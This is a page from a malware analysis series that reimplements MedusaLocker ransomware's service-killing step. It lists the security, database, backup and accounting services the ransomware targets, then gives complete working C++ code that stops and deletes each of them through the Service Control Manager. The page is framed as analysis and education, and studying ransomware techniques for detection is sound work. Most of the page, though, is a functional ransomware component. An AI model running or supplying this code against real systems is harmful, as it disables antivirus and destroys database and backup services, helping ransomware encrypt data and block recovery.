MalwareAnalysisSeries
This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules
Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham
MedusaLocker: Service Stop
Ransomware typically kills services running in a system to maximize its impact and increase the likelihood of a ransom payment. By terminating services related to antivirus and security software, ransomware can avoid detection and prevent its removal, allowing it to encrypt files without interference. Disabling database services and backup solutions ensures that organizations cannot easily restore their data from backups, thereby amplifying the pressure to pay the ransom. Additionally, stopping critical business services disrupts operations, causing significant downtime and financial loss. This combination of tactics—disabling security measures, hindering recovery efforts, and causing operational disruption—creates a dire situation for the victim, making them more likely to comply with the attackers’ demands to regain control of their systems and data.
In case of MedusaLocker Ransomware, it also contains a pre-defined list of services that it stops and deletes before launching the encryption operation.
Implementation
Pre-defined List of Services
LPCWSTR serviceNames[] = {
L"wrapper",
L"DefWatch",
L"ccEvtMgr",
L"ccSetMgr",
L"SavRoam",
L"sqlservr",
L"sqlagent",
L"sqladhlp",
L"Culserver",
L"RTVscan",
L"sqlbrowser",
L"SQLADHLP",
L"QBIDPService",
L"Intuit.QuickBooks.FCS",
L"QBCFMonitorService",
L"sqlwriter",
L"msmdsrv",
L"tomcat6",
L"zhudongfangyu",
L"SQLADHLP",
L"vmware-usbarbitator64",
L"vmware-converter",
L"dbsrv12"
};
Get Handle of Service Control Manager
To interact with services installed on a system, we need to get the handle of service control manager.
SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
if (schSCManager == NULL)
{
std::cerr << "Failed to open service control manager\n";
return -1;
}
Stop Services
To stop the services, we get handle to the target service using OpenServiceW. We can stop the target service using ControlService by passing it the FLAG: SERVICE_CONTROL_STOP. An additional step is also added which checks if a service is running or paused before stopping it using QueryServiceStatus.
SC_HANDLE schService = OpenServiceW(schSCManager, serviceName, SERVICE_STOP | SERVICE_QUERY_STATUS | DELETE);
if (schService == NULL)
{
std::cerr << "Failed to open service or service unavailable " << serviceName << "\n";
continue;
}
SERVICE_STATUS status;
if (QueryServiceStatus(schService, &status))
{
if (status.dwCurrentState == SERVICE_RUNNING || status.dwCurrentState == SERVICE_PAUSED)
{
std::cout << "Stopping service " << serviceName << "...\n";
if (ControlService(schService, SERVICE_CONTROL_STOP, &status))
std::cout << "Service " << serviceName << " stopped successfully\n";
else
std::cerr << "Failed to stop service " << serviceName << "\n";
}
}
Deleting Services
MedusaLocker deletes the defined services from victim system after stopping them. To delete the services, we will continue with the same handle and use DeleteService API.
std::cout << "Deleting service " << serviceName << "...\n";
if (DeleteService(schService))
std::cout << "Service " << serviceName << " deleted successfully\n";
else
std::cerr << "Failed to delete service " << serviceName << "\n";
CloseServiceHandle(schService);
Stop & Delete Services in a Loop
Since we have a pre-defined list of services available in an array, we will loop through it an kill each service using the above defined chunk of code.
int main()
{
SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
if (schSCManager == NULL)
{
std::cerr << "Failed to open service control manager\n";
return -1;
}
const int numServices = sizeof(serviceNames) / sizeof(serviceNames[0]);
for (int i = 0; i < numServices; ++i)
{
SC_HANDLE schService = OpenServiceW(schSCManager, serviceNames[i], SERVICE_STOP | SERVICE_QUERY_STATUS | DELETE);
if (schService == NULL)
{
std::cerr << "Failed to open service or service unavailable " << convert_to_printable(serviceNames[i]) << "\n";
continue;
}
SERVICE_STATUS status;
if (QueryServiceStatus(schService, &status))
{
if (status.dwCurrentState == SERVICE_RUNNING || status.dwCurrentState == SERVICE_PAUSED)
{
std::cout << "Stopping service " << convert_to_printable(serviceNames[i]) << "...\n";
if (ControlService(schService, SERVICE_CONTROL_STOP, &status))
std::cout << "Service " << convert_to_printable(serviceNames[i]) << " stopped successfully\n";
else
std::cerr << "Failed to stop service " << convert_to_printable(serviceNames[i]) << "\n";
}
}
else
{
//std::cerr << "Failed to query service " << convert_to_printable(serviceNames[i]) << " status\n";
continue;
}
std::cout << "Deleting service " << convert_to_printable(serviceNames[i]) << "...\n";
if (DeleteService(schService))
std::cout << "Service " << convert_to_printable(serviceNames[i]) << " deleted successfully\n";
else
std::cerr << "Failed to delete service " << convert_to_printable(serviceNames[i]) << "\n";
//details.push_back("Close handle: CloseServiceHandle");
CloseServiceHandle(schService);
}
CloseServiceHandle(schSCManager);
return 0;
}
Find Complete Code Click Here: Shaddy43/MalwareAnalaysisSeries
Disclaimer
Intended for educational purposes only!